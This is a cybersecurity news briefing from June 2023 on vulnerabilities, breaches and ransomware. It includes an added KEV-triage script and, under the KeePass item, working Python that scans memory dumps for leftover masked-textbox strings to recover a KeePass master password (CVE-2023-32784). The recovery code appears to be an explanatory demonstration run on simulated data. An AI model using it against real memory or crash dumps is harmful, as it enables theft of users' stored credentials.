Cyber Briefing - 2023.06.06

The latest in cybersecurity: CISA KEV, Ubuntu, Linux, KeePass, SpinOk Malware, Google Play, GIGABYTE, Atomic Wallet, Scrubs & Beyond, BBC, British Airways, Clop Ransomware gang.

Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.

First time seeing this? Please subscribe.

🚨 Cyber Alerts


1. CISA Adds New Vulnerabilities to Catalog

The Cybersecurity and Infrastructure Security Agency (CISA) has added two vulnerabilities, CVE-2023-33009 and CVE-2023-33010, to its Known Exploited Vulnerabilities (KEV) Catalog based on evidence of active exploitation. Both are buffer overflow vulnerabilities affecting multiple Zyxel firewall product lines; flaws of this kind are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Although Binding Operational Directive 22-01 binds only Federal Civilian Executive Branch (FCEB) agencies, CISA strongly urges all organizations to prioritize timely remediation of catalog vulnerabilities to reduce their exposure to attack. Organizations running affected Zyxel devices should apply the vendor's updates without delay.
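A check a defender would want after a KEV addition like this one, written here as an added example (it is not CISA tooling and not code from the original briefing): index the KEV catalog by CVE and cross-reference it against an internal vulnerability-scan result, reporting each hit's BOD 22-01 due date and whether it has already passed. The catalog JSON embedded below is a constructed sample that follows the field names of the real feed; its due dates are an assumption (three weeks after the 2023-06-05 addition), and the function names are mine. For real use, pull the live feed from the URL in the code.

```python
"""Cross-reference an internal CVE list against the CISA KEV catalog (offline example)."""
import json
from datetime import date
from typing import Iterable

# The live catalog is published at this URL. This example does not fetch it; it parses
# the constructed sample below, which mirrors the feed's field names.
KEV_URL = "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json"

# Constructed sample, not a copy of the real feed. Due dates assume the BOD 22-01 default
# of three weeks after the 2023-06-05 addition; use the live feed for authoritative values.
SAMPLE_KEV_JSON = """{
  "title": "CISA Catalog of Known Exploited Vulnerabilities",
  "catalogVersion": "sample",
  "count": 2,
  "vulnerabilities": [
    {"cveID": "CVE-2023-33009",
     "vendorProject": "Zyxel",
     "product": "Multiple Firewalls",
     "vulnerabilityName": "Zyxel Multiple Firewalls Buffer Overflow Vulnerability",
     "dateAdded": "2023-06-05",
     "shortDescription": "Buffer overflow in the notification function of multiple Zyxel firewalls.",
     "requiredAction": "Apply updates per vendor instructions.",
     "dueDate": "2023-06-26"},
    {"cveID": "CVE-2023-33010",
     "vendorProject": "Zyxel",
     "product": "Multiple Firewalls",
     "vulnerabilityName": "Zyxel Multiple Firewalls Buffer Overflow Vulnerability",
     "dateAdded": "2023-06-05",
     "shortDescription": "Buffer overflow in the ID processing function of multiple Zyxel firewalls.",
     "requiredAction": "Apply updates per vendor instructions.",
     "dueDate": "2023-06-26"}
  ]
}"""


def load_kev(raw_json: str) -> dict[str, dict]:
    """Index a KEV catalog document by CVE ID so lookups are constant time."""
    doc = json.loads(raw_json)
    return {entry["cveID"]: entry for entry in doc["vulnerabilities"]}


def triage(kev: dict[str, dict], inventory: Iterable[str], today: "date | str") -> list[dict]:
    """Return the inventory CVEs that appear in KEV, soonest due date first.

    Each hit carries the BOD 22-01 due date and the days remaining (negative once
    the deadline has passed). CVEs absent from KEV are dropped, not flagged.
    `today` may be a date or an ISO string such as "2023-06-06".
    """
    if isinstance(today, str):
        today = date.fromisoformat(today)
    hits = []
    for cve in set(inventory):
        entry = kev.get(cve.strip().upper())   # tolerate "cve-2023-..." from scanners
        if entry is None:
            continue
        due = date.fromisoformat(entry["dueDate"])
        hits.append({
            "cveID": entry["cveID"],
            "affected": f'{entry["vendorProject"]} {entry["product"]}',
            "dateAdded": entry["dateAdded"],
            "dueDate": entry["dueDate"],
            "daysLeft": (due - today).days,
            "overdue": due < today,
        })
    hits.sort(key=lambda h: (h["dueDate"], h["cveID"]))
    return hits


if __name__ == "__main__":
    # Constructed scan output: the two Zyxel KEV entries plus one CVE (the KeePass
    # flaw from item 4) that is not in the catalog and so must not be returned.
    scan_results = ["CVE-2023-33009", "CVE-2023-33010", "CVE-2023-32784"]
    for hit in triage(load_kev(SAMPLE_KEV_JSON), scan_results, "2023-06-06"):
        state = "OVERDUE" if hit["overdue"] else f'{hit["daysLeft"]} days left'
        print(f'{hit["cveID"]}  {hit["affected"]}  due {hit["dueDate"]}  ({state})')
```

The output is only as good as the inventory fed in: KEV lists CVEs, so the scan result must carry CVE identifiers rather than vendor advisory numbers, and a device that never appears in the inventory (an unmanaged edge firewall is the classic case) will never be flagged.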


2. Ubuntu Fixes Linux Vulnerabilities, Urges Updates

Between May 29 and June 4, 2023, Ubuntu released Security Notices addressing significant vulnerabilities in the Linux kernel packages shipped with several Ubuntu releases, including Ubuntu 14.04 ESM, Ubuntu 16.04 ESM, Ubuntu 18.04 ESM, Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 22.10.

The Canadian Centre for Cyber Security strongly advises users and administrators to review the relevant Ubuntu Security Notices and promptly apply the updates to protect their systems. Ubuntu Security Notices are issued by Ubuntu developers whenever a security issue is resolved in an official Ubuntu package, and they are the authoritative record of which package versions carry the fix.


3. Cybercriminals Target Banking Accounts in Latin America

An unidentified cybercrime threat actor has launched a targeted campaign to compromise online banking accounts in Mexico, Peru, and Portugal, focusing on Spanish- and Portuguese-speaking victims. Dubbed Operation CMDStealer by the BlackBerry Research and Intelligence Team, the campaign relies on LOLBAS (living-off-the-land binaries and scripts) and CMD-based scripts rather than custom binaries, which helps it blend in with legitimate administrative activity. The attack chain opens with social engineering: emails in Portuguese and Spanish using tax- or traffic-violation-themed lures trick recipients into triggering the infection, after which the attackers gain unauthorized access to the victims' systems and banking credentials.


4. KeePass Resolves Password Extraction Vulnerability

KeePass, the popular open-source password manager, has fixed CVE-2023-32784, a flaw that allowed the master password to be recovered in cleartext (minus its first character) from the process's memory, whether from a live process, a memory dump, or a swap, hibernation, or crash file. A recently released proof-of-concept (PoC) tool demonstrated the recovery against KeePass 2.x. The root cause was KeePass's custom-developed masked text box, which left a residual string in memory for every character typed, so the sequence of leftover strings revealed the password. KeePass 2.54 fixes the issue, and the developer advises users to update; until they do, anyone able to read the process's memory or the files it spills into can recover the master password.
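The leak pattern described above, modelled as an added example that is not code from KeePass or from the published PoC: the masked text box leaves one string per keystroke, made of N placeholder bullets followed by the character typed at position N, so a scan for that shape over a memory image reconstructs everything but the first character. The "dump" is constructed inside the code (no real process memory is read), the printable-ASCII filter on the recovered character is an assumption of this example, and the function names are mine.

```python
"""Simulated recovery of a master password from leftover masked-text-box strings."""
import re

# The masked text box shows U+25CF (a black circle) for every typed character.
BULLET = "\u25cf"
# KeePass is a .NET application, so its strings sit in memory as UTF-16LE.
BULLET_BYTES = BULLET.encode("utf-16-le")   # b"\xcf\x25"

# One leftover string per keystroke: N bullets, then the character typed at position N.
# Restricting the trailing code unit to printable ASCII is an assumption of this example,
# made so that random bytes after a bullet run are not misread as a password character.
LEAK_RE = re.compile(rb"((?:\xcf\x25)+)([\x20-\x7e]\x00)")


def simulate_textbox_leak(password: str, filler: bytes = b"") -> bytes:
    """Build a constructed stand-in for a memory dump.

    This models the disclosed behaviour; it is not real KeePass memory. For
    "Passw0rd" it emits "•a", "••s", "•••s", ... separated by filler bytes.
    The first keystroke leaves only "P" with no bullet prefix, which a scanner
    cannot tell apart from ordinary text, so nothing is emitted for position 0.
    """
    pieces = [filler]
    for n in range(1, len(password)):
        leaked = BULLET * n + password[n]
        pieces.append(leaked.encode("utf-16-le") + filler)
    return b"".join(pieces)


def recover_candidates(dump: bytes) -> dict[int, set[str]]:
    """Map each password position (1-based; position 0 is unrecoverable) to the
    set of characters seen after that many bullets. More than one candidate at a
    position means an unrelated string happened to match the pattern."""
    candidates: dict[int, set[str]] = {}
    for match in LEAK_RE.finditer(dump):
        position = len(match.group(1)) // 2          # each bullet is 2 bytes
        char = match.group(2).decode("utf-16-le")
        candidates.setdefault(position, set()).add(char)
    return candidates


def reconstruct(dump: bytes) -> str:
    """Assemble a best-effort password: '?' for the unrecoverable first character
    or a position with no leak, '{ab}' where several candidates compete.
    Returns '' when the dump holds no leak pattern at all."""
    candidates = recover_candidates(dump)
    if not candidates:
        return ""
    out = ["?"]
    for position in range(1, max(candidates) + 1):
        chars = candidates.get(position, set())
        if len(chars) == 1:
            out.append(next(iter(chars)))
        elif not chars:
            out.append("?")
        else:
            out.append("{" + "".join(sorted(chars)) + "}")
    return "".join(out)


if __name__ == "__main__":
    # Constructed filler: an unrelated UI string plus bytes that never form the bullet pair.
    noise = "Open Database".encode("utf-16-le") + bytes(range(0x80, 0xA0))
    dump = simulate_textbox_leak("Passw0rd!", noise)
    print(reconstruct(dump))   # → ?assw0rd!
```

Because the leaked strings survive wherever the process's memory ends up, the same scan works against a pagefile, a hibernation file, or a crash dump, which is why updating, rather than merely locking the database, is the fix. The `{..}` notation shows how the technique degrades when other strings collide with the pattern: the attacker is left with a short candidate list per position, not a failure.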


5. SpinOk Malware Infects Android Apps: Millions at Risk

CloudSEK's security team has uncovered a new wave of Android apps on Google Play carrying the SpinOk malware, which has reportedly been installed more than 30 million times. CloudSEK identified 193 apps embedding the malicious SDK, 43 of them still live on the store. SpinOk, first documented by Doctor Web, is a software supply chain attack: it ships as a marketing SDK that presents a legitimate-looking mini-game and rewards module to users while silently stealing files and tampering with clipboard contents, so app developers who integrated it distributed the malware without knowing. Despite CloudSEK's report and its communication with Google, many of the infected apps remain available for download, illustrating how hard it is to clean up an SDK-level compromise across a distribution platform the size of Google Play.


6. GIGABYTE Fixes Motherboard Vulnerabilities

GIGABYTE has responded to security vulnerabilities affecting more than 270 of its motherboard models by releasing firmware updates that address the flaws. The issues were discovered by Eclypsium in a legitimate GIGABYTE feature: the firmware drops and runs a software auto-update application in Windows during boot, and Eclypsium found that this updater fetched and executed code from GIGABYTE servers without adequately validating the connection or verifying the downloaded file's signature. An attacker in a man-in-the-middle position could therefore deliver malware through a mechanism that is re-planted by the firmware on every boot. GIGABYTE has released updated firmware for its Intel and AMD series motherboards that, according to the company, adds signature verification for downloaded files and stricter checks during the boot process. Users should install the updated firmware; those who do not want the feature at all can also disable the auto-update option in the BIOS setup so that the application is no longer installed.


💥 Cyber Incidents


7. Crypto Theft: Atomic Wallet Investigates $35M+

Atomic Wallet, a popular mobile and desktop crypto wallet, is investigating a large-scale theft of cryptocurrency from users' wallets, with more than $35 million reportedly stolen. The developers say they are working with third-party security companies to investigate the incident, trace the stolen funds, and have them frozen when they reach exchanges. Users are advised to move their crypto assets to other wallets while the investigation is underway. The cause of the breach remains unclear, and victims are asked to submit details of their losses through a dedicated Google Docs form.


8. Severe Data Exposure at Scrubs & Beyond

Scrubs & Beyond, a popular online retailer of healthcare uniforms and accessories, has suffered a major data exposure that leaves customers' personally identifiable information and sensitive financial data open to the public. The exposed server holds roughly 400 GB of data covering more than 100,000 customer records, including credit card details and PayPal payment logs, and is reachable without authentication; because it is indexed by search engines such as Shodan, anyone who knows where to look can find it. Despite being alerted multiple times, the company has not responded, raising concerns about its handling of the incident and its commitment to security.


9. Spanish Bank Hit by Ransomware

Globalcaja, a major Spanish bank, has confirmed that it is dealing with a ransomware attack affecting several of its offices. The Play ransomware group has claimed responsibility and says it stole private and confidential data, including client and employee documents, passports, and contracts. The bank says the attack has not affected client transactions or accounts; security protocols have been activated and some operations have been temporarily limited. The incident adds to a growing list of ransomware attacks on Spanish financial institutions in 2023 and underlines the need for stronger defences across the sector.


10. Martinique Endures Prolonged Cyberattack

The Caribbean island of Martinique is grappling with a relentless cyberattack that has caused extensive disruptions to its internet access and overall infrastructure for an extended period. With a population of approximately 360,000, Martinique is a French-controlled territory functioning as an outermost region of the European Union. The cyberattack, which began on May 16, has significantly impacted the community, prompting officials to isolate affected systems and engage cybersecurity experts to gradually restore operations. As the island faces ongoing challenges, measures are being implemented to restore internet access in educational institutions and establish alternative procedures for financial services and social benefit payments, while authorities investigate the attack and provide guidance on cybersecurity protocols.


11. BBC and BA Data Breach via Zellis

The BBC and British Airways have suffered a data breach exposing their employees' personal information after a cyber incident at their payroll provider, Zellis. The extent of the breach is still being urgently investigated, but neither company believes that employees' bank account details were compromised. Zellis, which processes payroll for many other companies, has attributed the incident to the zero-day vulnerability in Progress Software's MOVEit Transfer product, so the impact may extend to a larger number of organizations, potentially including notable clients such as Jaguar Land Rover, Iceland, Dyson, and Aer Lingus.


12. University Investigates Cyber Attack

The University of Rochester is investigating a cybersecurity incident stemming from a software vulnerability in a third-party file transfer product. According to the University, the same flaw has affected some 2,500 organizations worldwide. While the full extent of the impact and the personal data accessed are still unknown, the University's IT staff is working with the FBI and an external digital forensics firm to assess the situation and determine the necessary actions. The University urges students, faculty, staff, and dependents to take immediate steps to protect their personal information and to contact their financial institutions and credit monitoring agencies if they notice suspicious activity.


📢 Cyber News


13. Kaspersky Unveils iOS Malware Scanner

Cybersecurity firm Kaspersky has released a tool to detect the 'Triangulation' malware that has been infecting Apple iPhones and other iOS devices. Kaspersky discovered the malware on its own corporate network and says the campaign, dubbed 'Operation Triangulation,' has been active since at least 2019 and has infected devices worldwide. The attackers deliver the exploit through an iMessage attachment that abuses a previously unknown vulnerability to run code with no user interaction; the implant then downloads additional payloads to execute commands and collect information. Kaspersky's scanner, triangle_check, inspects an iOS device backup for the campaign's indicators of compromise, helping individuals and organizations identify possible infections and respond to what appears to be a state-sponsored espionage operation.


14. Infamous Hacker Group Revives BreachedForums

According to rumors reported by vx-underground on Twitter, the notorious hacker group ShinyHunters is set to take over the now-defunct cybercrime market BreachForums and run a revived version of the forum under new administration. ShinyHunters is known for its involvement in major data breaches, including those affecting T-Mobile and AT&T. The news has sparked both interest and concern in the cybersecurity community: given the group's history of ruthlessness and successful breaches, a relaunched forum could become a busy marketplace for stolen data in the near future.


15. Clop Gang: MOVEit Extortion Masterminds Revealed!

The Clop ransomware gang has claimed responsibility for the recent data theft attacks that exploited a zero-day vulnerability in Progress Software's MOVEit Transfer (CVE-2023-34362, an SQL injection flaw) to steal data from multiple companies' servers. The claim confirms Microsoft's attribution of the attacks to the group it tracks as 'Lace Tempest,' which overlaps with TA505 and FIN11. Consistent with its past large-scale campaigns, Clop exploited the flaw over the Memorial Day holiday weekend, when staffing is minimal and detection is slow. The group says it has not yet begun contacting victims, but that organizations that refuse to pay will see their stolen data published on its leak site.


Subscribe and Comment.

Copyright © 2023 CyberMaterial. All Rights Reserved.

Follow CyberMaterial on:

LinkedIn, Twitter, Reddit, Instagram, Facebook, YouTube, and Medium.